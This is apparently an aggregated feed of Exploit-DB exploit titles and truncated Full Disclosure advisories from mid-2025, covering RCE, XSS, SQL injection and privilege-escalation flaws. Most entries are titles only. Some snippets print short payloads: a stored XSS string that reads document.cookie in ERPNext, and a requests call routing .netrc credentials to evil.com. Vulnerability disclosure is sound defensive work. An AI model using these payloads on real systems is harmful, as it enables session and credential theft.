Exploit-DB Updates

[remote] FortiOS SSL-VPN 7.4.4 - Insufficient Session Expiration & Cookie Reuse

FortiOS SSL-VPN 7.4.4 - Insufficient Session Expiration & Cookie Reuse

Exploit-DB Updates

[local] Microsoft Excel LTSC 2024 - Remote Code Execution (RCE)

Microsoft Excel LTSC 2024 - Remote Code Execution (RCE)

Exploit-DB Updates

[remote] Ingress-NGINX 4.11.0 - Remote Code Execution (RCE)

Ingress-NGINX 4.11.0 - Remote Code Execution (RCE)

Full Disclosure

: "Glass Cage" – Zero-Click iMessage → Persistent iOS Compromise + Bricking (CVE-2025-24085 / 24201, CNVD-2025-07885)

Posted by josephgoyd via Fulldisclosure on Jun 17

"Glass Cage" – Sophisticated Zero-Click iMessage Exploit ChainEnabling Persistent iOS Compromise and Device Bricking

CVE-2025-24085, CVE-2025-24201(CNVD-2025-07885)

Author: Joseph Goydish II
Date: 06/10/2025
Release Type: Full Disclosure
Platform Affected: iOS 18.2 (confirmed zero-day at time of discovery)
Delivery Vector: iMessage (default configuration)
Impact: Remote Code Execution, Privilege Escalation, Keychain Exfiltration,...

Full Disclosure

SEC Consult SA-20250612-0 :: Reflected Cross-Site Scripting in ONLYOFFICE Docs (DocumentServer)

Posted by SEC Consult Vulnerability Lab via Fulldisclosure on Jun 17

SEC Consult Vulnerability Lab Security Advisory < 20250612-0 >
=======================================================================
title: Reflected Cross-Site Scripting
product: ONLYOFFICE Docs (DocumentServer)
vulnerable version: <=8.3.1
fixed version: 8.3.2 or higher
CVE number: CVE-2025-5301
impact: Medium
homepage: https://www.onlyoffice.com/...

Full Disclosure

SEC Consult SA-20250611-0 :: Undocumented Root Shell Access on SIMCom SIM7600G Modem

Posted by SEC Consult Vulnerability Lab via Fulldisclosure on Jun 17

SEC Consult Vulnerability Lab Security Advisory < 20250611-0 >
=======================================================================
title: Undocumented Root Shell Access
product: SIMCom - SIM7600G Modem
vulnerable version: Firmware Revision: LE20B03SIM7600M21-A
fixed version: -
CVE number: CVE-2025-26412
impact: Medium
homepage: https://www.simcom.com...

Full Disclosure

Call for Applications: ERCIM STM WG 2025 Award for the Best Ph.D. Thesis on Security and Trust Management (July 31, 2025)

Posted by 0610648533 on Jun 17

========================================================================

CALL FOR APPLICATIONS

ERCIM STM WG 2025 Award for the

Best Ph.D. Thesis on Security and Trust Management

========================================================================

The European Research Consortium in Informatics and Mathematics (ERCIM)
has a technical WG on Security and Trust Management (STM) for performing
a series of activities, as research projects,...

Exploit-DB Updates

[remote] WebDAV Windows 10 - Remote Code Execution (RCE)

WebDAV Windows 10 - Remote Code Execution (RCE)

Exploit-DB Updates

[webapps] Litespeed Cache WordPress Plugin 6.3.0.1 - Privilege Escalation

Litespeed Cache WordPress Plugin 6.3.0.1 - Privilege Escalation

Exploit-DB Updates

[remote] Windows 11 SMB Client - Privilege Escalation & Remote Code Execution (RCE)

Windows 11 SMB Client - Privilege Escalation & Remote Code Execution (RCE)

Exploit-DB Updates

[local] Parrot and DJI variants Drone OSes - Kernel Panic Exploit

Parrot and DJI variants Drone OSes - Kernel Panic Exploit

Exploit-DB Updates

[webapps] PHP CGI Module 8.3.4 - Remote Code Execution (RCE)

PHP CGI Module 8.3.4 - Remote Code Execution (RCE)

Exploit-DB Updates

[local] Microsoft Excel Use After Free - Local Code Execution

Microsoft Excel Use After Free - Local Code Execution

Exploit-DB Updates

[remote] AirKeyboard iOS App 1.0.5 - Remote Input Injection

AirKeyboard iOS App 1.0.5 - Remote Input Injection

Exploit-DB Updates

[webapps] Skyvern 0.1.85 - Remote Code Execution (RCE) via SSTI

Skyvern 0.1.85 - Remote Code Execution (RCE) via SSTI

Exploit-DB Updates

[remote] PCMan FTP Server 2.0.7 - Buffer Overflow

PCMan FTP Server 2.0.7 - Buffer Overflow

Exploit-DB Updates

[webapps] Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS)

Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS)

Exploit-DB Updates

[webapps] Roundcube 1.6.10 - Remote Code Execution (RCE)

Roundcube 1.6.10 - Remote Code Execution (RCE)

Exploit-DB Updates

[remote] Windows File Explorer Windows 10 Pro x64 - TAR Extraction

Windows File Explorer Windows 10 Pro x64 - TAR Extraction

Exploit-DB Updates

[remote] Freefloat FTP Server 1.0 - Remote Buffer Overflow

Freefloat FTP Server 1.0 - Remote Buffer Overflow

Full Disclosure

SEC Consult SA-20250604-0 :: Local Privilege Escalation and Default Credentials in INDAMED - MEDICAL OFFICE (Medical practice management) Demo version

Posted by SEC Consult Vulnerability Lab via Fulldisclosure on Jun 09

SEC Consult Vulnerability Lab Security Advisory < 20250604-0 >
=======================================================================
title: Local Privilege Escalation and Default Credentials
product: INDAMED - MEDICAL OFFICE (Medical practice management)
Demo version
vulnerable version: Revision 18544 (II/2024)
fixed version: Q2/2025 (Privilege Escalation, Default Password)...

Full Disclosure

Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain → Secure Enclave Key Theft, Wormable RCE, Crypto Theft

Posted by josephgoyd via Fulldisclosure on Jun 09

Hello Full Disclosure,

This is a strategic public disclosure of a zero-click iMessage exploit chain that was discovered live on iOS 18.2 and
remained unpatched through iOS 18.4. It enabled Secure Enclave key theft, wormable remote code execution, and
undetectable crypto wallet exfiltration. Despite responsible disclosure, the research was suppressed by the vendor.
Apple issued a silent fix in iOS 18.4.1 (April 2025) without public...

Exploit-DB Updates

[webapps] Laravel Pulse 1.3.1 - Arbitrary Code Injection

Laravel Pulse 1.3.1 - Arbitrary Code Injection

Exploit-DB Updates

[local] Microsoft Windows 11 Version 24H2 Cross Device Service - Elevation of Privilege

Microsoft Windows 11 Version 24H2 Cross Device Service - Elevation of Privilege

Exploit-DB Updates

[remote] ProSSHD 1.2 20090726 - Denial of Service (DoS)

ProSSHD 1.2 20090726 - Denial of Service (DoS)

Exploit-DB Updates

[local] TightVNC 2.8.83 - Control Pipe Manipulation

TightVNC 2.8.83 - Control Pipe Manipulation

Exploit-DB Updates

[webapps] CloudClassroom PHP Project 1.0 - SQL Injection

CloudClassroom PHP Project 1.0 - SQL Injection

Exploit-DB Updates

[remote] Microsoft Windows Server 2025 JScript Engine - Remote Code Execution (RCE)

Microsoft Windows Server 2025 JScript Engine - Remote Code Execution (RCE)

Exploit-DB Updates

[remote] Grandstream GSD3710 1.0.11.13 - Stack Overflow

Grandstream GSD3710 1.0.11.13 - Stack Overflow

Exploit-DB Updates

[local] macOS LaunchDaemon iOS 17.2 - Privilege Escalation

macOS LaunchDaemon iOS 17.2 - Privilege Escalation

Exploit-DB Updates

[remote] ABB Cylon Aspect 3.08.04 DeploySource - Remote Code Execution (RCE)

ABB Cylon Aspect 3.08.04 DeploySource - Remote Code Execution (RCE)

Exploit-DB Updates

[remote] Apache Tomcat 10.1.39 - Denial of Service (DoS)

Apache Tomcat 10.1.39 - Denial of Service (DoS)

Full Disclosure

Defense in depth -- the Microsoft way (part 89): user group policies don't deserve tamper protection

Posted by Stefan Kanthak on Jun 03

Hi @ll,

user group policies are stored in DACL-protected registry keys
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies]
respectively [HKEY_CURRENT_USER\Software\Policies] and below, where
only the SYSTEM account and members of the "Administrators" user group
are granted write access.

At logon the user's registry hive "%USERPROFILE%\ntuser.dat" is loaded
with exclusive (read, write and...

Full Disclosure

CVE-2025-45542: Time-Based Blind SQL Injection in CloudClassroom PHP Project v1.0

Posted by Sanjay Singh on Jun 03

Hello Full Disclosure list,

I am sharing details of a newly assigned CVE affecting an open-source
educational software project:

------------------------------------------------------------------------
CVE-2025-45542: Time-Based Blind SQL Injection in CloudClassroom PHP
Project v1.0
------------------------------------------------------------------------

Product: CloudClassroom PHP Project
Vendor:...

Full Disclosure

ERPNext v15.53.1 Stored XSS in bio Field Allows Arbitrary Script Execution in Profile Page

Posted by Ron E on Jun 03

An authenticated attacker can inject JavaScript into the bio field of their
user profile. When the profile is viewed by another user, the injected
script executes.

*Proof of Concept:*

POST
/api/method/frappe.desk.page.user_profile.user_profile.update_profile_info
HTTP/2
Host: --host--

profile_info={"bio":"\"><img src=x onerror=alert(document.cookie)>"}

Full Disclosure

ERPNext v15.53.1 Stored XSS in user_image Field Allows Script Execution via Injected Image Path

Posted by Ron E on Jun 03

An authenticated user can inject malicious JavaScript into the user_image
field of the profile page using an XSS payload within the file path or HTML
context. This field is rendered without sufficient sanitization, allowing
stored script execution in the context of other authenticated users.

*Proof of Concept:*POST
/api/method/frappe.desk.page.user_profile.user_profile.update_profile_info
HTTP/2
Host: --host--...

Full Disclosure

Local information disclosure in apport and systemd-coredump

Posted by Qualys Security Advisory via Fulldisclosure on Jun 03

Qualys Security Advisory

Local information disclosure in apport and systemd-coredump
(CVE-2025-5054 and CVE-2025-4598)

========================================================================
Contents
========================================================================

Summary
Mitigation
Local information disclosure in apport (CVE-2025-5054)
- Background
- Analysis
- Proof of concept
Local information disclosure in systemd-coredump...

Full Disclosure

Stored XSS via File Upload - adaptcmsv3.0.3

Posted by Andrey Stoykov on Jun 03

# Exploit Title: Stored XSS via File Upload - adaptcmsv3.0.3
# Date: 06/2025
# Exploit Author: Andrey Stoykov
# Version: 3.0.3
# Tested on: Debian 12
# Blog: https://msecureltd.blogspot.com/

Stored XSS via File Upload #1:

Steps to Reproduce:

1. Login with low privilege user and visit "Profile" > "Edit Your Profile"

2. Click on "Choose File" and upload the following file

html-xss.html

<!DOCTYPE html>...

Full Disclosure

IDOR "Change Password" Functionality - adaptcmsv3.0.3

Posted by Andrey Stoykov on Jun 03

# Exploit Title: IDOR "Change Password" Functionality - adaptcmsv3.0.3
# Date: 06/2025
# Exploit Author: Andrey Stoykov
# Version: 3.0.3
# Tested on: Debian 12
# Blog: https://msecureltd.blogspot.com/

IDOR "Change Password" Functionality #1:

Steps to Reproduce:

1. Login as user with low privilege and visit profile page
2. Select "Edit Your Profile" and click "Submit"
3. Trap the HTTP POST request
4. Set...

Full Disclosure

Stored XSS "Send Message" Functionality - adaptcmsv3.0.3

Posted by Andrey Stoykov on Jun 03

# Exploit Title: Stored XSS "Send Message" Functionality - adaptcmsv3.0.3
# Date: 06/2025
# Exploit Author: Andrey Stoykov
# Version: 3.0.3
# Tested on: Debian 12
# Blog: https://msecureltd.blogspot.com/

Stored XSS "Send Message" Functionality #1:

Steps to Reproduce:

1. Login as normal user and visit "Profile" > "Message" > "Send Message"
2. In "Message" field enter the...

Full Disclosure

Authenticated File Upload to RCE - adaptcmsv3.0.3

Posted by Andrey Stoykov on Jun 03

# Exploit Title: Authenticated File Upload to RCE - adaptcmsv3.0.3
# Date: 06/2025
# Exploit Author: Andrey Stoykov
# Version: 3.0.3
# Tested on: Debian 12
# Blog: https://msecureltd.blogspot.com/

Authenticated File Upload to RCE #1:

Steps to Reproduce:

1. Login as admin user and visit "System" > "Appearance" > "Themes" >
"Default" > "Theme Files" and choose "Add New File"...

Full Disclosure

Stored XSS in "Description" Functionality - cubecartv6.5.9

Posted by Andrey Stoykov on Jun 03

# Exploit Title: Stored XSS in "Description" Functionality - cubecartv6.5.9
# Date: 05/2025
# Exploit Author: Andrey Stoykov
# Version: 6.5.9
# Tested on: Debian 12
# Blog: https://msecureltd.blogspot.com/

Stored XSS #1:

Steps to Reproduce:

1. Visit "Account" > "Address Book" and choose "Edit"
2. In the "Description" parameter enter the following payload...

Full Disclosure

Multiple Vulnerabilities in SAP GuiXT Scripting

Posted by Michał Majchrowicz via Fulldisclosure on Jun 03

Security Advisory

Vulnerabilities reported to vendor: March 13, 2025
Vendor requested additional information: March 20, 2025
Additional information provided to vendor: March 22, 2025
Vendor confirmed the reported issues but rejected them: March 31, 2025
Additional information provided to vendor: May 6, 2025
Vendor confirmed the reported issues but rejected them: May 15, 2025
Vendor closed the tickets for all reported issues: May 16, 2025
Public...

Full Disclosure

CVE-2024-47081: Netrc credential leak in PSF requests library

Posted by Juho Forsén via Fulldisclosure on Jun 03

The PSF requests library (https://github.com/psf/requests & https://pypi.org/project/requests/) leaks .netrc
credentials to third parties due to incorrect URL processing under specific conditions.

Issuing the following API call triggers the vulnerability:

requests.get('http://example.com:@evil.com/&apos;)

Assuming .netrc credentials are configured for example.com, they are leaked to evil.com by the call.

The root cause is...

Full Disclosure

Exploit CVE-2019-9978: Remote Code Execution in Social Warfare WordPress Plugin (<= 3.5.2)

Posted by Housma mardini on Jun 03

Hi,

I am submitting an exploit for *CVE-2019-9978*, a remote code execution
vulnerability in the Social Warfare WordPress plugin (version <= 3.5.2).

*Exploit Title*: CVE-2019-9978: Remote Code Execution in Social Warfare
WordPress Plugin (<= 3.5.2)

*Date*: 2025-05-20

*Exploit Author*: Huseyin Mardinli

*Vendor Homepage*: https://warfareplugins.com/

*Software Link*: https://wordpress.org/plugins/social-warfare/

*Version*: <= 3.5.2...

Full Disclosure

Youpot honeypot

Posted by Jacek Lipkowski via Fulldisclosure on Jun 03

Hi,

I made a novel honeypot for worms called Youpot.

Normally a honeypot will try to implement whatever service it thinks the
attacker would like. For a high interaction or pure honeypot this is often
impossible, because of the thousands of possibilities. Even a simple
telnet server will have thousands of variants: different banners,
different shells, different default passwords, on different IoT devices
etc.

Youpot works around this by...

Exploit-DB Updates

[webapps] WordPress Digits Plugin 8.4.6.1 - Authentication Bypass via OTP Bruteforcing

WordPress Digits Plugin 8.4.6.1 - Authentication Bypass via OTP Bruteforcing

Exploit-DB Updates

[remote] Fortra GoAnywhere MFT 7.4.1 - Authentication Bypass

Fortra GoAnywhere MFT 7.4.1 - Authentication Bypass

Exploit-DB Updates

[remote] Automic Agent 24.3.0 HF4 - Privilege Escalation

Automic Agent 24.3.0 HF4 - Privilege Escalation

Exploit-DB Updates

[remote] Windows File Explorer Windows 11 (23H2) - NTLM Hash Disclosure

Windows File Explorer Windows 11 (23H2) - NTLM Hash Disclosure

Exploit-DB Updates

[remote] SolarWinds Serv-U 15.4.2 HF1 - Directory Traversal

SolarWinds Serv-U 15.4.2 HF1 - Directory Traversal

Exploit-DB Updates

[webapps] Campcodes Online Hospital Management System 1.0 - SQL Injection

Campcodes Online Hospital Management System 1.0 - SQL Injection

Full Disclosure

SEC Consult SA-20250521-0 :: Multiple Vulnerabilities in eCharge Hardy Barth cPH2 and cPP2 charging stations

Posted by SEC Consult Vulnerability Lab via Fulldisclosure on May 27

SEC Consult Vulnerability Lab Security Advisory < 20250521-0 >
=======================================================================
title: Multiple Vulnerabilities
product: eCharge Hardy Barth cPH2 and cPP2 charging stations
vulnerable version: 2.2.0
fixed version: Not available
CVE number: CVE-2025-27803, CVE-2025-27804, CVE-2025-48413,
CVE-2025-48414, CVE-2025-48415,...

Full Disclosure

Structured Query Language Injection in frappe.desk.reportview.get_list Endpoint in Frappe Framework

Posted by Ron E on May 27


An authenticated SQL injection vulnerability exists in the frappe.desk.reportview.get_list API of the Frappe Framework,
affecting versions v15.56.1. The vulnerability stems from improper sanitization of the fields[] parameter, which allows
low-privileged users to inject arbitrary SQL expressions directly into the SELECT clause.

Sample Structured Query Language Injection:

Request:

GET...

Exploit-DB Updates

[remote] ABB Cylon Aspect 3.08.03 - Guest2Root Privilege Escalation

ABB Cylon Aspect 3.08.03 - Guest2Root Privilege Escalation

Exploit-DB Updates

[local] ABB Cylon Aspect Studio 3.08.03 - Binary Planting

ABB Cylon Aspect Studio 3.08.03 - Binary Planting

Exploit-DB Updates

[remote] Windows 2024.15 - Unauthenticated Desktop Screenshot Capture

Windows 2024.15 - Unauthenticated Desktop Screenshot Capture

Exploit-DB Updates

[local] Microsoft Windows Server 2016 - Win32k Elevation of Privilege

Microsoft Windows Server 2016 - Win32k Elevation of Privilege

Exploit-DB Updates

[webapps] WordPress User Registration & Membership Plugin 4.1.2 - Authentication Bypass

WordPress User Registration & Membership Plugin 4.1.2 - Authentication Bypass

Exploit-DB Updates

[remote] Grandstream GSD3710 1.0.11.13 - Stack Buffer Overflow

Grandstream GSD3710 1.0.11.13 - Stack Buffer Overflow